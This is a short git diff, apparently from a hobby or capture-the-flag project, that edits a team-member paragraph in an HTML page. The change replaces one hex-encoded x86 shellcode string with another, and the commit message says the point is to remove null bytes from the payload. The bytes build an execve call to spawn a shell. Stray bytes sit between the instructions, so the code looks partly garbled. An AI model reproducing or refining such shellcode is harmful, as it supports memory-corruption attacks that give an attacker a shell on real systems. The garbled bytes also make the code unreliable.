~ Fix my payload which had \x0 bytes

--- a/index.html
+++ b/index.html
@@ -127,7 +127,7 @@ body, html {
         <div class="w3-container">
           <h3>Panda</h3>
           <p class="w3-opacity">Fondateur</p>
-          <p>BLABLABLAH: \x89\xe3\xb8\x6e\x69\x62\x2f\x50\xb8\x73\x61\x62\x2f\x50\xb8\x00\x00\x0a\x68\x13\x50\x14\x31\xc0\x16\x31\xc9\x18\x31\xd2\x1a\xb0\x0b\x1c\xcd\x80</p>
+          <p>BLABLABLAH: \x89\xe3\xb8\x6e\x69\x62\x2f\x50\xb8\x73\x61\x62\x2f\x50\xb0\x68\x10\xd1\xe0\x12\xb0\x0a\x14\xc1\xe0\x02\x17\x50\x18\x31\xc0\x1a\x31\xc9\x1c\x31\xd2\x1e\xb0\x0b\x20\xcd\x80</p>
         </div>
       </div>
     </div>
